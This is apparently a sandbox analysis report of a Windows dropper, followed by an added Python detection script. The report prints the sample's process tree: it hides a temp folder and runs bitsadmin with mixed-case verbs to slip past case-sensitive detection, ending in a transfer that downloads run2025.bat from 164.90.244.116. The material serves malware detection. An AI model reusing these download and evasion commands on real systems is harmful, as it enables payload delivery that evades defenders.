Analysis
-
max time kernel: 94s
max time network: 96s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-08-2024 14:05
-
Static task: static1
Behavioral task: behavioral1
Sample: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Resource: win7-20240705-en
General
-
Target: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Size: 126KB
MD5: b2dc0f8a36a7e450b11149a8e15ca964
SHA1: 27fd3d24a969b5b0528b69f1cbd8b293e74a6809
SHA256: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
SHA512: 135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
SSDEEP: 1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process (occurrences)
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe (12), cmd.exe (5), attrib.exe (1), ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe (1)
-
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
Each parent wrote to each child three times (18 parent/child pairs, 54 writes).
pid | process | target pid | target process | writes
4036 | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | 1760 | cmd.exe | 3
1760 | cmd.exe | 3592 | attrib.exe | 3
1760 | cmd.exe | 2028 | cmd.exe | 3
2028 | cmd.exe | 4348 | bitsadmin.exe | 3
1760 | cmd.exe | 1756 | bitsadmin.exe | 3
1760 | cmd.exe | 4472 | bitsadmin.exe | 3
1760 | cmd.exe | 4236 | cmd.exe | 3
4236 | cmd.exe | 3192 | bitsadmin.exe | 3
1760 | cmd.exe | 4564 | bitsadmin.exe | 3
1760 | cmd.exe | 4968 | bitsadmin.exe | 3
1760 | cmd.exe | 1916 | cmd.exe | 3
1916 | cmd.exe | 2932 | bitsadmin.exe | 3
1760 | cmd.exe | 3284 | bitsadmin.exe | 3
1760 | cmd.exe | 4576 | bitsadmin.exe | 3
1760 | cmd.exe | 3300 | cmd.exe | 3
3300 | cmd.exe | 4436 | bitsadmin.exe | 3
1760 | cmd.exe | 5060 | bitsadmin.exe | 3
1760 | cmd.exe | 896 | bitsadmin.exe | 3
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
Image: C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe (depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4036
-
Image: C:\Windows\SysWOW64\cmd.exe (depth 2)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t27959.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1760
-
Image: C:\Windows\SysWOW64\attrib.exe (depth 3)
Command line: attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3592
-
Image: C:\Windows\SysWOW64\cmd.exe (depth 3)
Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2028
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 4)
Command line: Bitsadmin
- System Location Discovery: System Language Discovery
PID:4348
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin
- System Location Discovery: System Language Discovery
PID:1756
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin /crEaTe pls
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:4472
-
Image: C:\Windows\SysWOW64\cmd.exe (depth 3)
Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4236
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 4)
Command line: Bitsadmin
- System Location Discovery: System Language Discovery
PID:3192
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin
- System Location Discovery: System Language Discovery
PID:4564
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin /ResUme pls
- System Location Discovery: System Language Discovery
PID:4968
-
Image: C:\Windows\SysWOW64\cmd.exe (depth 3)
Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 4)
Command line: Bitsadmin
- System Location Discovery: System Language Discovery
PID:2932
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin
- System Location Discovery: System Language Discovery
PID:3284
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin /CompLete pls
- System Location Discovery: System Language Discovery
PID:4576
-
Image: C:\Windows\SysWOW64\cmd.exe (depth 3)
Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3300
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 4)
Command line: Bitsadmin
- System Location Discovery: System Language Discovery
PID:4436
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin
- System Location Discovery: System Language Discovery
PID:5060
-
Image: C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
Command line: bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:896
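The process tree above is what a detection would key on: a living-off-the-land binary (bitsadmin.exe) driven from a batch file in a freshly hidden Temp\ytmp directory, with the BITS job verbs typed in mixed case (/crEaTe, /ResUme, /CompLete, /TRanSfer) so that a case-sensitive string match on "/create" or "/transfer" sees nothing, plus a geofence lookup of Control Panel\International\Geo\Nation by the dropper itself. The Python below is an added example, not code from the sandbox or from the sample. It runs a small detection pass over events constructed from this report; the event dictionaries, their field names and the `full_bits_chain` rule are assumptions of the example, not the sandbox's export format. It normalizes verb case, ties each /transfer back through its parent chain to the dropper, and stores the remote URL exactly as captured (the report shows it without "//" after "http:") rather than normalizing it away.

```python
"""Added example: detection pass over sandbox-style process and registry events.

The event schema (pid/ppid/image/cmdline and pid/op/key dictionaries) is an
assumption of this example, not the sandbox's export format.
"""
import re
from collections import defaultdict

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
TMP = r"C:\Users\Admin\AppData\Local\Temp"

# Constructed from the process tree in the report (PIDs, images and command
# lines as reported; ppid 0 marks the root of the tree).
PROCESS_EVENTS = [
    {"pid": 4036, "ppid": 0, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 1760, "ppid": 4036, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f'C:\\Windows\\system32\\cmd.exe /c ""{TMP}\\ytmp\\t27959.bat" "{SAMPLE}" "'},
    {"pid": 3592, "ppid": 1760, "image": r"C:\Windows\SysWOW64\attrib.exe",
     "cmdline": f"attrib +h {TMP}\\ytmp"},
    {"pid": 4472, "ppid": 1760, "image": r"C:\Windows\SysWOW64\bitsadmin.exe",
     "cmdline": "bitsadmin /crEaTe pls"},
    {"pid": 4968, "ppid": 1760, "image": r"C:\Windows\SysWOW64\bitsadmin.exe",
     "cmdline": "bitsadmin /ResUme pls"},
    {"pid": 4576, "ppid": 1760, "image": r"C:\Windows\SysWOW64\bitsadmin.exe",
     "cmdline": "bitsadmin /CompLete pls"},
    {"pid": 896, "ppid": 1760, "image": r"C:\Windows\SysWOW64\bitsadmin.exe",
     "cmdline": r"bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat"},
]
# Constructed from the signature tables in the report.
REGISTRY_EVENTS = [
    {"pid": 4036, "op": "Key value queried",
     "key": r"\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation"},
    {"pid": 1756, "op": "Key opened", "key": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"},
    {"pid": 4036, "op": "Key opened", "key": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"},
]

# Real bitsadmin switches: the four seen in the report plus /addfile and
# /SetNotifyCmdLine. IGNORECASE is the whole point: the sample mixes case.
BITS_VERB = re.compile(r"/(create|addfile|resume|complete|transfer|setnotifycmdline)\b", re.IGNORECASE)
BITS_TRANSFER = re.compile(r"/transfer\s+(\S+)\s+(\S+)\s+(\S+)", re.IGNORECASE)  # /transfer <job> <remote> <local>
ATTRIB_HIDE = re.compile(r"\battrib\b.*\+h\s+(\S+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def bits_verbs(event: dict) -> list:
    """BITS verbs in a bitsadmin.exe command line, lower-cased. Keyed on the
    image rather than the text so a cmd.exe wrapper does not double-count."""
    if basename(event["image"]) != "bitsadmin.exe":
        return []
    return [m.group(1).lower() for m in BITS_VERB.finditer(event["cmdline"])]


def full_bits_chain(verbs: list) -> bool:
    """Assumed rule: one parent drove a whole job (create/resume/complete for a
    queued download, or a one-shot /transfer)."""
    v = set(verbs)
    return {"create", "resume", "complete"} <= v or "transfer" in v


def ancestry(pid: int, events: list) -> list:
    """Image basenames from pid up to the root: bitsadmin.exe <- cmd.exe <- dropper."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def analyze(process_events: list, registry_events: list) -> dict:
    findings = {"bits_jobs": defaultdict(list), "transfers": [], "hidden_paths": [],
                "geofence_pids": [], "language_lookups": 0}
    for e in process_events:
        for verb in bits_verbs(e):
            findings["bits_jobs"][e["ppid"]].append(verb)  # group verbs by the driving parent
        if basename(e["image"]) == "bitsadmin.exe":
            m = BITS_TRANSFER.search(e["cmdline"])
            if m:
                findings["transfers"].append({"job": m.group(1), "url": m.group(2), "dest": m.group(3),
                                              "chain": ancestry(e["pid"], process_events)})
        if basename(e["image"]) == "attrib.exe":
            m = ATTRIB_HIDE.search(e["cmdline"])
            if m:
                findings["hidden_paths"].append(m.group(1))
    for r in registry_events:
        key = r["key"].lower()
        if key.endswith(r"\control panel\international\geo\nation"):
            findings["geofence_pids"].append(r["pid"])  # the geofence read
        elif key.endswith(r"\control\nls\language"):
            findings["language_lookups"] += 1
    findings["bits_jobs"] = dict(findings["bits_jobs"])
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(PROCESS_EVENTS, REGISTRY_EVENTS), indent=2))
```

Grouping the verbs by parent PID rather than by the bitsadmin PID is deliberate: each bitsadmin.exe in the tree is a separate short-lived process, and only the cmd.exe running the batch file (PID 1760 here) sees the whole create/resume/complete/transfer sequence.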
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 2KB
MD5: 9f9313c2c1cd60650bc4be0175a93d05
SHA1: 53f62a866349d2c08c6bb5c9c7bfad3faf785a77
SHA256: 380d4be6e794605bb9777361f1c5221f8597e29a4f03c35360b5884e588d2011
SHA512: 18fd8d7e685371ff9a3506c4a925e2aff927b2da6d6195689ba7c240c28654b6c71aa724eeee66a181b2f6f231bcd24635b314c54c2d80713e3c89937a4b213e